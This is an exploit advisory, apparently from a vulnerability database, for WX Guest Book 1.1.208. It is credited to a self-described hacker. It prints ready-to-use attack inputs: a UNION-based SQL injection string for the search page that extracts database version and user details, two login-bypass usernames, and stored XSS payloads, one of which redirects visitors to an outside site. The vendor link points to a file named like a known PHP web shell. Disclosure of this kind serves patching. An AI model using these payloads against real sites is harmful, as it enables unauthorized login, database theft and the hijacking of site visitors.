WX Guest Book 1.1.208 (SQL/XSS) Multiple Remote Vulnerabilities

🗓️ 15 Dec 2009 00:00:00Reported by RootType

WX Guest Book 1.1.208 (SQL/XSS) vulnerabilities, SQLi and persistent XSS issue


                                                ###########################################
#	WX Guest Book 1.1.208 Vulns	  #
#	By xxHackerXzX hacker from nepal	  #
#	[email protected]	  #
###########################################

Product name: WX Guestbook 1.1.208
Product vendor: http://www.ekin0x.com/r57.txt

This product suffers from multiple SQLi and persistent XSS vuln.

##############  SQL Search Vuln  ###############

The search parameters/queries we submit to the search.php are unsanitized and hence \
this can be compromised to SQLinject the server.

SQL query:
$signs = DB_Execute(&quot;SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%&quot; . $QUERY . \
&quot;%') ORDER BY `code` DESC&quot;);

The $QUERY is what we submit through search box so injecting this will sql inject the \
server. The following is the sample sql injection example.


Sample search string: test%') UNION ALL SELECT \
1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*

##############  SQL login bypass  ###############
The username and password fields are unsanitized and hence we can bypass the login \
systems.

Username: admin'))/*
Password: learn3r  [or whatever]

Or

Username: ')) or 1=1/*
Password: learn3r  [or whatever]

##############  Persistent XSS Vulns  ##############

In the name field (I suppose as I don't understand arabic), you can inject XSS...
&lt;script&gt;alert(String.fromCharCode(97));&lt;/script&gt;
&lt;script&gt;location.replace(&quot;http://www.ekin0x.com&quot;)&lt;/script&gt;

15 Dec 2009 00:00Current

7.1High risk

Vulners AI Score7.1